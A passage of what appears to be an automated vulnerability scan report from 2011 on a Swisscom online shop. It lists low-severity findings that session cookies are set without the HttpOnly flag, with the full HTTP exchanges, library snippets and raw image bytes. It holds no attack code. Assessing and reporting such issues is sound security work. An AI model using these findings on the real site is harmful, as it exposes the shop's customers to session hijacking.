User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:01 GMT
Set-Cookie: JSESSIONID=8BB248CE535D3B2D4DFCCA8AB890F3BD; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "c658fa264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...

18.80. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.nyroModal-1.6.2.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.nyroModal-1.6.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery.nyroModal-1.6.2.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:02 GMT
Set-Cookie: JSESSIONID=9F3CE76E80DCF4A01108C5BF5FFF0B89; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "e2a68274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 52530

/*
* nyroModal - jQuery Plugin
* http://nyromodal.nyrodev.com
*
* Copyright (c) 2010 Cedric Nirousset (nyrodev.com)
* Licensed under the MIT license
*
* $Date: 2010-02-23 (Tue, 23 Feb 2010) $

...[SNIP]...

18.81. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.plugin.1.0.3.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.plugin.1.0.3.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery.plugin.1.0.3.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:58 GMT
Set-Cookie: JSESSIONID=73807B368610AF8D04440B8C58FF1A9C; Path=/
Cache-Control: max-age=18000
Last-Modified: Mon, 28 Mar 2011 12:41:03 GMT
Accept-Ranges: bytes
ETag: "e4618a6645edcb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 2977

/*
*jQuery browser plugin detection 1.0.3
* http://plugins.jquery.com/project/jqplugin
* Checks for plugins / mimetypes supported in the browser extending the jQuery.browser object
* Copyright
...[SNIP]...

18.82. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/search.popup.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/search.popup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/search.popup.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:03 GMT
Set-Cookie: JSESSIONID=31B4E41C322C0BBC6E6B831D3415A53D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "e2a68274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 3431

var searchCrossDomainSrc;

$(function() {
   if ($.cookie('searchPopupActive') == window.location.href) {
       var urlPrefix = $.cookie('searchPopupUrlPrefix');
       var searchString = $.cookie('searchPopupSe
...[SNIP]...

18.83. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/WebResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/WebResource.axd?d=GEESsNREEEZ8sIhNDZh1Ng2&t=633805181503593750 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:42 GMT
Set-Cookie: JSESSIONID=A90E943E50B429926E446479265F6216; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Mon, 23 Apr 2012 02:52:25 GMT
Last-Modified: Sat, 13 Jun 2009 17:29:10 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 20794

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

18.84. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/Produkteverzeichnis/01_Festnetz/Aton_cl112/aton_clt112/small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/Produkteverzeichnis/01_Festnetz/Aton_cl112/aton_clt112/small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/Produkteverzeichnis/01_Festnetz/Aton_cl112/aton_clt112/small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:25 GMT
Set-Cookie: JSESSIONID=F84B5A8A44B244705C31FDC2D973CC56; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 08 Dec 2010 12:55:32 GMT
Accept-Ranges: bytes
ETag: "93b9c032d796cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2500

GIF89aN.[..?.....
....0[.(.k.................................G...........|.....................a{.......................................................................................................
...[SNIP]...

18.85. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/cards/taxcard/taxcard20_23655_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/cards/taxcard/taxcard20_23655_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/cards/taxcard/taxcard20_23655_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:25 GMT
Set-Cookie: JSESSIONID=A0B503D32E320DD44034DA90D908BD1A; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 05 Oct 2010 13:27:58 GMT
Accept-Ranges: bytes
ETag: "a0795e209164cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2586

GIF89aN.[..?.rYL..............j..........fQI.'..sj@4.oW.......YG.rh.aa........|....yb~L<..!..^....~_..u...........)u.......|....\...nkp..v.JHMP\...0/=....+D.........SB<.....f.v}..............n.......
...[SNIP]...

18.86. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/directories/directories_76465_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/directories/directories_76465_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/directories/directories_76465_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:25 GMT
Set-Cookie: JSESSIONID=1159FBD0B7B829F4273D3B3CA35EE59A; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 08 Jun 2010 09:23:26 GMT
Accept-Ranges: bytes
ETag: "b07fa93fec6cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 3446

GIF89aN.[..?.......l...YSWYZ!T.....).....r.'G.O{....2W. !&.N.~.....Rh.#b.%..+@w&5W...S..3e..!....'[..]..A8.Qaw.....FZ.<`.'M.0H.rsw.....~6|.cz.<Q....?...x.@t.g ....4O..=[...*R..l....jKtc..-m.>k....=?@.
...[SNIP]...

18.87. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/fax/multiphone/top_mx94/top_mx94_119978_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/fax/multiphone/top_mx94/top_mx94_119978_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/fax/multiphone/top_mx94/top_mx94_119978_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=5A8F1DFDD5ED0DD7A9293AE46CF3F0F8; Path=/
Cache-Control: max-age=18000
Last-Modified: Mon, 21 Jul 2008 11:40:46 GMT
Accept-Ranges: bytes
ETag: "b0217e9d26ebc81:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 1911

GIF89aN.[..?..........e|.%7Iy..+@VUds...L[j...................'3............Wv.'a.^v.......5LcGc.s........nv...>Zw...9Qj...Wm....DQ]/F^......U}.......EV..Bp............<ALl.3.............3.........Q
...[SNIP]...

18.88. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/festnetz_abos/plauderabo/plauderabo_120092_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/festnetz_abos/plauderabo/plauderabo_120092_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/festnetz_abos/plauderabo/plauderabo_120092_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:26 GMT
Set-Cookie: JSESSIONID=6F5F0A9132115F4359BDC79B72575C9B; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 15 May 2008 10:42:02 GMT
Accept-Ranges: bytes
ETag: "c097714f78b6c81:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 3373

GIF89aN.[..?.........._.X...XI:qtk.oV..'..............R..oSUHufS-&...i........x............jXF........B...VeF...=6,..!.....=........z.....P..L...............s.i..n...FD7..l.~e.........}.vdi]..i.......
...[SNIP]...

18.89. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/fax/fx310/125092_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/fax/fx310/125092_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/fax/fx310/125092_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:25 GMT
Set-Cookie: JSESSIONID=F468DD3EF984A3CCA8BEFBB1A2CE0CDC; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 23 Sep 2008 12:06:32 GMT
Accept-Ranges: bytes
ETag: "58b23ed1741dc91:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 3585

GIF89aN.[..?.................&,..................jsz............Zcj......GPYdmty.......................s{.9CK.........,6?......R[c........................ox_ho........................................
...[SNIP]...

18.90. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_c28/aton_c28_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/telefone/aton_c28/aton_c28_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/telefone/aton_c28/aton_c28_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=65E8EE31FB0643A4A86EF230F6B5EEAC; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 28 Jan 2009 12:02:01 GMT
Accept-Ranges: bytes
ETag: "34e5733a4081c91:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2765

GIF89aN.[..?.FFG...888......gggWWW'''......vvu..................z|}aceKKM...MPSntyZ[\...<==?ACCCCkkl...RRQ...bba......>=;]]\rqq......MLK???nnm.............//,,,......___......!!!``a###111444...@@A....
...[SNIP]...

18.91. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_cl311/129893_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/telefone/aton_cl311/129893_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/telefone/aton_cl311/129893_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=9DCCBE6BE35BE8865D0A0E237A9D9180; Path=/
Cache-Control: max-age=18000
Last-Modified: Tue, 18 Aug 2009 11:12:45 GMT
Accept-Ranges: bytes
ETag: "458515d0f41fca1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2380

GIF89aN.[..?....mos.........*R.!2f......CEHUWY...&(,47:<?B...wy|...~...........Z..s%M....../14!#&IKN*-0......Z]`5........NQT2o..........beh...........................................Da.KX.........b...
...[SNIP]...

18.92. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_cl411/small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/telefone/aton_cl411/small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/telefone/aton_cl411/small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=0E7AAE519B64364D59357407613BF000; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 28 Jan 2010 13:19:53 GMT
Accept-Ranges: bytes
ETag: "b510a9931ca0ca1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2582

GIF89aN.[..?..........JOT.....#......Xs.......-591:=...ww|ggl...CGK....%*5=@y................. )....klp'/3.........TW[...............s+1...    .._cfnpt....................$__c...7+,.........<?Dtpv...."(.
...[SNIP]...

18.93. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_clt615_isdn/small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/telefone/aton_clt615_isdn/small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/telefone/aton_clt615_isdn/small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=6865F4B9493482D7ED544A3ECCF37867; Path=/
Cache-Control: max-age=18000
Last-Modified: Mon, 14 Jun 2010 11:26:28 GMT
Accept-Ranges: bytes
ETag: "70dc3d6eb4bcb1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 1809

GIF89aN.[..?.)14......wxw........................dfkRW[LRVBGK....'+<BF\be..~lloGMQW\`.........39=...}~y......mru...{{............rsq............qpu........$......%%'bcc..........................`_bP
...[SNIP]...

18.94. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/gigaset_c590/c590_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/foto_2008/telefone/gigaset_c590/c590_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/foto_2008/telefone/gigaset_c590/c590_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=8BC6617DE82137B1BC3AC3CD56C1EA2F; Path=/
Cache-Control: max-age=18000
Last-Modified: Mon, 02 Nov 2009 09:58:44 GMT
Accept-Ranges: bytes
ETag: "c0846810a35bca1:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 2590

GIF89aN.[..?..f......................N[q...............K................................<...........r{........................./{...........................................................L[..........
...[SNIP]...

18.95. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/telefone/spezial_apparate/wad_a25/wad_a25_83419_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/telefone/spezial_apparate/wad_a25/wad_a25_83419_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/telefone/spezial_apparate/wad_a25/wad_a25_83419_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=77F58F412635EEB495D96302E9952D29; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 14 May 2008 11:57:19 GMT
Accept-Ranges: bytes
ETag: "e05b7ba9b9b5c81:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 3626

GIF89aN.[..?...u............/1)..............SK1......OQK.........ojS......one......%) ........}.......{a................ .........................E>)..r...]_W...8<6......d\=CF@...!$.................
...[SNIP]...

18.96. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/telefone/zubehoer/div/repeater_107904_small.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/products/telefone/zubehoer/div/repeater_107904_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/products/telefone/zubehoer/div/repeater_107904_small.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=C56DA644FCDADCD8AF4F925D161F06C6; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 15 May 2008 09:18:24 GMT
Accept-Ranges: bytes
ETag: "c0456aa06cb6c81:27ce"
X-Powered-By: ASP.NET
Content-Type: image/gif
Connection: close
Content-Length: 3075

GIF89aN.[..?....:DKLV]...QZaHRY#+0Zcj...lsyNX^T]d1;AJT[DNU......emsR\bFPV.$(@JQv}.BLSCMT?IPKU[GQXV_f7BH=GNOY_LW^NV^.."U\c5?Fbinpw}KT\R\d...Xah...{..Yag8@F^gm...QX_HQXDLR...LU\MW]@GN...ajpS[a...ISZ....
...[SNIP]...

18.97. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/os_festnetz/promo.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/content/promo_teaser/os_festnetz/promo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/images/content/promo_teaser/os_festnetz/promo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:26 GMT
Set-Cookie: JSESSIONID=F052A01C49AD70B965281B5BD66053BA; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 13 Feb 2008 07:22:39 GMT
Accept-Ranges: bytes
ETag: "6a2a136116ec81:27ce"
X-Powered-By: ASP.NET
Content-Type: image/jpeg
Connection: close
Content-Length: 65012

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

18.98. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/promotional/Siemens_Gigaset_SL400_EN.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
